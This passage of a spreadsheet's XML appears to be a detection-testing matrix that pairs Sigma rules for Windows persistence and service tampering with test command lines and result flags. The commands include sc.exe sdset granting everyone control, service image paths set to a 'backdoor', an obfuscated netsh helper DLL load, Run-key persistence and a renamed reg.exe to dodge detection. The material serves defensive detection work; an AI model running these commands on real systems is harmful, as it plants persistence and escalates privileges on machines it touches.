      <c r="D634" s="44" t="inlineStr">
        <is>
          <t>d937b75f-a665-4480-88a5-2f20e9f9b22a</t>
        </is>
      </c>
      <c r="E634" s="44" t="n"/>
      <c r="F634" s="44" t="n"/>
      <c r="G634" s="44" t="n"/>
      <c r="H634" s="44" t="n"/>
      <c r="I634" s="44" t="n"/>
      <c r="J634" s="44" t="n"/>
      <c r="K634" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="635" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A635" s="44" t="n"/>
      <c r="B635" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_hide_sevices</t>
        </is>
      </c>
      <c r="C635" s="44" t="inlineStr">
        <is>
          <t>Service DACL Abuse To Hide Services Via Sc.EXE</t>
        </is>
      </c>
      <c r="D635" s="44" t="inlineStr">
        <is>
          <t>a537cfc3-4297-4789-92b5-345bfd845ad0</t>
        </is>
      </c>
      <c r="E635" s="44" t="n"/>
      <c r="F635" s="44" t="n"/>
      <c r="G635" s="44" t="n"/>
      <c r="H635" s="44" t="n"/>
      <c r="I635" s="44" t="n"/>
      <c r="J635" s="44" t="n"/>
      <c r="K635" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="636" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A636" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B636" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_hide_sevices</t>
        </is>
      </c>
      <c r="C636" s="44" t="inlineStr">
        <is>
          <t>Service DACL Abuse To Hide Services Via Sc.EXE</t>
        </is>
      </c>
      <c r="D636" s="44" t="inlineStr">
        <is>
          <t>a537cfc3-4297-4789-92b5-345bfd845ad0</t>
        </is>
      </c>
      <c r="E636" s="44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F636" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G636" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H636" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I636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636" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K636" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="637" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A637" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B637" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_hide_sevices</t>
        </is>
      </c>
      <c r="C637" s="44" t="inlineStr">
        <is>
          <t>Service DACL Abuse To Hide Services Via Sc.EXE</t>
        </is>
      </c>
      <c r="D637" s="44" t="inlineStr">
        <is>
          <t>a537cfc3-4297-4789-92b5-345bfd845ad0</t>
        </is>
      </c>
      <c r="E637" s="44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637" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G637" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H637" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I637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637" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K637" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="638" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A638" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B638" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_hide_sevices</t>
        </is>
      </c>
      <c r="C638" s="44" t="inlineStr">
        <is>
          <t>Service DACL Abuse To Hide Services Via Sc.EXE</t>
        </is>
      </c>
      <c r="D638" s="44" t="inlineStr">
        <is>
          <t>a537cfc3-4297-4789-92b5-345bfd845ad0</t>
        </is>
      </c>
      <c r="E638" s="44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638" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G638" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H638" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I638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638" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K638" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="639" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A639" s="44" t="n"/>
      <c r="B639" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_modification</t>
        </is>
      </c>
      <c r="C639" s="44" t="inlineStr">
        <is>
          <t>Service Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D639" s="44" t="inlineStr">
        <is>
          <t>98c5aeef-32d5-492f-b174-64a691896d25</t>
        </is>
      </c>
      <c r="E639" s="44" t="n"/>
      <c r="F639" s="44" t="n"/>
      <c r="G639" s="44" t="n"/>
      <c r="H639" s="44" t="n"/>
      <c r="I639" s="44" t="n"/>
      <c r="J639" s="44" t="n"/>
      <c r="K639" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="640" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A640" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B640" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_modification</t>
        </is>
      </c>
      <c r="C640" s="44" t="inlineStr">
        <is>
          <t>Service Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D640" s="44" t="inlineStr">
        <is>
          <t>98c5aeef-32d5-492f-b174-64a691896d25</t>
        </is>
      </c>
      <c r="E640" s="44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640" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G640" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H640" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I640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640" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K640" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="641" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A641" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B641" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_modification</t>
        </is>
      </c>
      <c r="C641" s="44" t="inlineStr">
        <is>
          <t>Service Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D641" s="44" t="inlineStr">
        <is>
          <t>98c5aeef-32d5-492f-b174-64a691896d25</t>
        </is>
      </c>
      <c r="E641" s="44" t="inlineStr">
        <is>
          <t>sc.exe "sdset" scmanager D:(A;;KA;;;WD)</t>
        </is>
      </c>
      <c r="F641" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G641" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H641" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I641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641" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K641" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="642" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A642" s="44" t="n"/>
      <c r="B642" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_service_tamper_for_persistence</t>
        </is>
      </c>
      <c r="C642" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Attempt Via Existing Service Tampering</t>
        </is>
      </c>
      <c r="D642" s="44" t="inlineStr">
        <is>
          <t>38879043-7e1e-47a9-8d46-6bec88e201df</t>
        </is>
      </c>
      <c r="E642" s="44" t="inlineStr">
        <is>
          <t>reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\ExampleService" /v ImagePath /t REG_EXPAND_SZ /d "C:\Windows\Temp\backdoor" /f</t>
        </is>
      </c>
      <c r="F642" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G642" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H642" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I642" s="44" t="n"/>
      <c r="J642" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K642" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="643" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A643" s="44" t="inlineStr">
        <is>
          <t>t1546.007</t>
        </is>
      </c>
      <c r="B643" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_helper_dll_persistence</t>
        </is>
      </c>
      <c r="C643" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Via Netsh Helper DLL</t>
        </is>
      </c>
      <c r="D643" s="44" t="inlineStr">
        <is>
          <t>56321594-9087-49d9-bf10-524fe8479452</t>
        </is>
      </c>
      <c r="E643" s="44" t="inlineStr">
        <is>
          <t>netsh.exe "a""d""d" "h""e""l""p""e""r" evil.dll</t>
        </is>
      </c>
      <c r="F643" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G643" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H643" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I643" s="44" t="n"/>
      <c r="J643" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K643" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="644" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A644" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B644" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_create_service</t>
        </is>
      </c>
      <c r="C644" s="44" t="inlineStr">
        <is>
          <t>New Service Creation Using PowerShell</t>
        </is>
      </c>
      <c r="D644" s="44" t="inlineStr">
        <is>
          <t>c02e96b7-c63a-4c47-bd83-4a9f74afcfb2</t>
        </is>
      </c>
      <c r="E644" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "New-Service -Name 'TestService' -bin 'cmd.exe' -StartupType Manual"</t>
        </is>
      </c>
      <c r="F644" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G644" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H644" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I644" s="44" t="n"/>
      <c r="J644" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K644" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="645" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A645" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B645" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_create_service</t>
        </is>
      </c>
      <c r="C645" s="44" t="inlineStr">
        <is>
          <t>New Service Creation Using PowerShell</t>
        </is>
      </c>
      <c r="D645" s="44" t="inlineStr">
        <is>
          <t>c02e96b7-c63a-4c47-bd83-4a9f74afcfb2</t>
        </is>
      </c>
      <c r="E645" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "N`ew-Service -Name 'TestService' -BinaryPathName 'cmd.exe' -StartupType Manual"</t>
        </is>
      </c>
      <c r="F645" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G645" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H645" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I645" s="44" t="n"/>
      <c r="J645" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K645" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="646" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A646" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B646" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_service_tamper_for_persistence</t>
        </is>
      </c>
      <c r="C646" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Attempt Via Existing Service Tampering</t>
        </is>
      </c>
      <c r="D646" s="44" t="inlineStr">
        <is>
          <t>38879043-7e1e-47a9-8d46-6bec88e201df</t>
        </is>
      </c>
      <c r="E646" s="44" t="inlineStr">
        <is>
          <t>reg.exe add HKLM\SYSTEM\CurrentControlSet\Services\ExampleService /v ImagePath /t REG_EXPAND_SZ /d C:\Windows\Temp\backdoor /f</t>
        </is>
      </c>
      <c r="F646" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G646" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H646" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I646" s="44" t="n"/>
      <c r="J646" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K646" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="647" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A647" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B647" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_service_tamper_for_persistence</t>
        </is>
      </c>
      <c r="C647" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Attempt Via Existing Service Tampering</t>
        </is>
      </c>
      <c r="D647" s="44" t="inlineStr">
        <is>
          <t>38879043-7e1e-47a9-8d46-6bec88e201df</t>
        </is>
      </c>
      <c r="E647" s="44" t="inlineStr">
        <is>
          <t>sc.exe config ExampleService binPath= calc.exe</t>
        </is>
      </c>
      <c r="F647" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G647" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H647" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I647" s="44" t="n"/>
      <c r="J647" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K647" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="648" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A648" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B648" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_change_sevice_image_path_by_non_admin</t>
        </is>
      </c>
      <c r="C648" s="44" t="inlineStr">
        <is>
          <t>Possible Privilege Escalation via Weak Service Permissions</t>
        </is>
      </c>
      <c r="D648" s="44" t="inlineStr">
        <is>
          <t>d937b75f-a665-4480-88a5-2f20e9f9b22a</t>
        </is>
      </c>
      <c r="E648" s="44" t="inlineStr">
        <is>
          <t>sc.exe  config   "WeakService"   BINPATH=   "mal.exe"</t>
        </is>
      </c>
      <c r="F648" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G648" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H648" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I648" s="44" t="n"/>
      <c r="J648" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K648" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="649" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A649" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B649" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_change_sevice_image_path_by_non_admin</t>
        </is>
      </c>
      <c r="C649" s="44" t="inlineStr">
        <is>
          <t>Possible Privilege Escalation via Weak Service Permissions</t>
        </is>
      </c>
      <c r="D649" s="44" t="inlineStr">
        <is>
          <t>d937b75f-a665-4480-88a5-2f20e9f9b22a</t>
        </is>
      </c>
      <c r="E649" s="44" t="inlineStr">
        <is>
          <t>sc.exe config WeakService binPath= "mal.exe"</t>
        </is>
      </c>
      <c r="F649" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G649" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H649" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I649" s="44" t="n"/>
      <c r="J649" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K649" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="650" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A650" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B650" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_change_sevice_image_path_by_non_admin</t>
        </is>
      </c>
      <c r="C650" s="44" t="inlineStr">
        <is>
          <t>Possible Privilege Escalation via Weak Service Permissions</t>
        </is>
      </c>
      <c r="D650" s="44" t="inlineStr">
        <is>
          <t>d937b75f-a665-4480-88a5-2f20e9f9b22a</t>
        </is>
      </c>
      <c r="E650" s="44" t="inlineStr">
        <is>
          <t>sc.exe config WeakService BINPATH=mal.exe</t>
        </is>
      </c>
      <c r="F650" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G650" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H650" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I650" s="44" t="n"/>
      <c r="J650" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K650" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="651" ht="15.75" customHeight="1" s="42">
      <c r="A651" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B651" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_change_sevice_image_path_by_non_admin</t>
        </is>
      </c>
      <c r="C651" s="44" t="inlineStr">
        <is>
          <t>Possible Privilege Escalation via Weak Service Permissions</t>
        </is>
      </c>
      <c r="D651" s="44" t="inlineStr">
        <is>
          <t>d937b75f-a665-4480-88a5-2f20e9f9b22a</t>
        </is>
      </c>
      <c r="E651" s="44" t="inlineStr">
        <is>
          <t>sc.exe config WeakService "BINPATH=mal.exe"</t>
        </is>
      </c>
      <c r="F651" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G651" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H651" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I651" s="44" t="n"/>
      <c r="J651" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K651" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="652" ht="15.75" customHeight="1" s="42">
      <c r="A652" s="44" t="inlineStr">
        <is>
          <t>t1547.001</t>
        </is>
      </c>
      <c r="B652" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_add_run_key</t>
        </is>
      </c>
      <c r="C652" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Attempt Via Run Keys Using Reg.EXE</t>
        </is>
      </c>
      <c r="D652" s="44" t="inlineStr">
        <is>
          <t>de587dce-915e-4218-aac4-835ca6af6f70</t>
        </is>
      </c>
      <c r="E652" s="44" t="inlineStr">
        <is>
          <t>REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Persistence /t REG_SZ /F /D "payload.exe"</t>
        </is>
      </c>
      <c r="F652" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G652" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H652" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I652" s="44" t="n"/>
      <c r="J652" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K652" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="653" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A653" s="44" t="inlineStr">
        <is>
          <t>t1547.001</t>
        </is>
      </c>
      <c r="B653" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_add_run_key</t>
        </is>
      </c>
      <c r="C653" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Attempt Via Run Keys Using Reg.EXE</t>
        </is>
      </c>
      <c r="D653" s="44" t="inlineStr">
        <is>
          <t>de587dce-915e-4218-aac4-835ca6af6f70</t>
        </is>
      </c>
      <c r="E653" s="44" t="inlineStr">
        <is>
          <t>reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Persistence /t REG_SZ /d "payload.exe" /f</t>
        </is>
      </c>
      <c r="F653" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G653" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H653" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I653" s="44" t="n"/>
      <c r="J653" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K653" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="654" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A654" s="44" t="inlineStr">
        <is>
          <t>t1547.001</t>
        </is>
      </c>
      <c r="B654" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_add_run_key</t>
        </is>
      </c>
      <c r="C654" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Attempt Via Run Keys Using Reg.EXE</t>
        </is>
      </c>
      <c r="D654" s="44" t="inlineStr">
        <is>
          <t>de587dce-915e-4218-aac4-835ca6af6f70</t>
        </is>
      </c>
      <c r="E654" s="44" t="inlineStr">
        <is>
          <t>REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Persistence" /t REG_SZ /F /D "payload.exe"</t>
        </is>
      </c>
      <c r="F654" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G654" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H654" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I654" s="44" t="n"/>
      <c r="J654" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K654" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="655" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A655" s="44" t="inlineStr">
        <is>
          <t>t1547.001</t>
        </is>
      </c>
      <c r="B655" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_add_run_key</t>
        </is>
      </c>
      <c r="C655" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Attempt Via Run Keys Using Reg.EXE</t>
        </is>
      </c>
      <c r="D655" s="44" t="inlineStr">
        <is>
          <t>de587dce-915e-4218-aac4-835ca6af6f70</t>
        </is>
      </c>
      <c r="E655" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Persistence /t REG_SZ /d "payload.exe" /f</t>
        </is>
      </c>
      <c r="F655" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G655" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H655" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I655" s="44" t="n"/>
      <c r="J655" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K655" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="656" ht="15.75" customHeight="1" s="42">
      <c r="A656" s="44" t="inlineStr">
        <is>
          <t>t1547.001</t>
        </is>
      </c>
      <c r="B656" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_add_run_key</t>
        </is>
      </c>
      <c r="C656" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Attempt Via Run Keys Using Reg.EXE</t>
        </is>
      </c>
      <c r="D656" s="44" t="inlineStr">
        <is>
          <t>de587dce-915e-4218-aac4-835ca6af6f70</t>
        </is>
      </c>
      <c r="E656" s="44" t="inlineStr">
        <is>
          <t>copy reg.exe not_reg.exe &amp;&amp; not_reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Persistence /t REG_SZ /d "payload.exe"</t>
        </is>
      </c>
      <c r="F656" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G656" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H656" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I656" s="44" t="n"/>
      <c r="J656" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K656" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="657" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A657" s="44" t="inlineStr">
        <is>
          <t>t1547.001</t>
        </is>
      </c>
      <c r="B657" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_add_run_key</t>
        </is>
      </c>
      <c r="C657" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Attempt Via Run Keys Using Reg.EXE</t>
        </is>
      </c>
      <c r="D657" s="44" t="inlineStr">
        <is>
          <t>de587dce-915e-4218-aac4-835ca6af6f70</t>
        </is>
      </c>
      <c r="E657" s="44" t="inlineStr">
        <is>
          <t>reg  add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NetWire /t REG_SZ  /d "C:\\Users\\admin\\AppData\\Roaming\\Install\\Host.exe" /f</t>
        </is>
      </c>
      <c r="F657" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G657" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H657" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I657" s="44" t="n"/>
      <c r="J657" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K657" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="658" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A658" s="44" t="inlineStr">
        <is>
          <t>t1547.001</t>
        </is>
      </c>
      <c r="B658" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_add_run_key</t>
        </is>
      </c>
      <c r="C658" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Attempt Via Run Keys Using Reg.EXE</t>
        </is>
      </c>
      <c r="D658" s="44" t="inlineStr">
        <is>
          <t>de587dce-915e-4218-aac4-835ca6af6f70</t>
        </is>
      </c>
      <c r="E658" s="44" t="inlineStr">
        <is>
          <t>REG  ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "C:\\Path\\AtomicRedTeam.exe"</t>
        </is>
      </c>
      <c r="F658" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G658" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H658" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I658" s="44" t="n"/>
      <c r="J658" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K658" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="659" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A659" s="44" t="inlineStr">
        <is>
          <t>t1546.001</t>
        </is>
      </c>
      <c r="B659" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_assoc_execution</t>
        </is>
      </c>
      <c r="C659" s="44" t="inlineStr">
        <is>
          <t>Change Default File Association Via Assoc</t>
        </is>
      </c>
      <c r="D659" s="44" t="inlineStr">
        <is>
          <t>3d3aa6cd-6272-44d6-8afc-7e88dfef7061</t>
        </is>
      </c>
      <c r="E659" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c assoc .hta=txtfile</t>
        </is>
      </c>
      <c r="F659" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G659" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H659" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I659" s="44" t="n"/>
      <c r="J659" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K659" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="660" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A660" s="44" t="inlineStr">
        <is>
          <t>t1546.001</t>
        </is>
      </c>
      <c r="B660" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_assoc_execution</t>
        </is>
      </c>
      <c r="C660" s="44" t="inlineStr">
        <is>
          <t>Change Default File Association Via Assoc</t>
        </is>
      </c>
      <c r="D660" s="44" t="inlineStr">
        <is>
          <t>3d3aa6cd-6272-44d6-8afc-7e88dfef7061</t>
        </is>
      </c>
      <c r="E660" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "assoc .hta=txtfile"</t>
        </is>
      </c>
      <c r="F660" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G660" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H660" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I660" s="44" t="n"/>
      <c r="J660" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K660" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="661" ht="15.75" customHeight="1" s="42">
      <c r="A661" s="44" t="inlineStr">
        <is>
          <t>t1546.001</t>
        </is>
      </c>
      <c r="B661" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_assoc_tamper_exe_file_association</t>
        </is>
      </c>
      <c r="C661" s="44" t="inlineStr">
        <is>
          <t>Change Default File Association To Executable Via Assoc</t>
        </is>
      </c>
      <c r="D661" s="44" t="inlineStr">
        <is>
          <t>ae6f14e6-14de-45b0-9f44-c0986f50dc89</t>
        </is>
      </c>
      <c r="E661" s="44" t="inlineStr">
        <is>
          <t>assoc .txt=exefile</t>
        </is>
      </c>
      <c r="F661" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G661" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H661" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I661" s="44" t="n"/>
      <c r="J661" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K661" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="662" ht="15.75" customHeight="1" s="42">
      <c r="A662" s="44" t="inlineStr">
        <is>
          <t>t1546.001</t>
        </is>
      </c>
      <c r="B662" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_assoc_tamper_exe_file_association</t>
        </is>
      </c>
      <c r="C662" s="44" t="inlineStr">
        <is>
          <t>Change Default File Association To Executable Via Assoc</t>
        </is>
      </c>
      <c r="D662" s="44" t="inlineStr">
        <is>
          <t>ae6f14e6-14de-45b0-9f44-c0986f50dc89</t>
        </is>
      </c>
      <c r="E662" s="44" t="inlineStr">
        <is>
          <t>assoc .txt="exefile"</t>
        </is>
      </c>
      <c r="F662" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G662" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H662" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I662" s="44" t="n"/>
      <c r="J662" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K662" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="663" ht="15.75" customHeight="1" s="42">
      <c r="A663" s="44" t="inlineStr">
        <is>
          <t>t1546.001</t>
        </is>
      </c>
      <c r="B663" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_assoc_tamper_exe_file_association</t>
        </is>
      </c>
      <c r="C663" s="44" t="inlineStr">
        <is>
          <t>Change Default File Association To Executable Via Assoc</t>
        </is>
      </c>
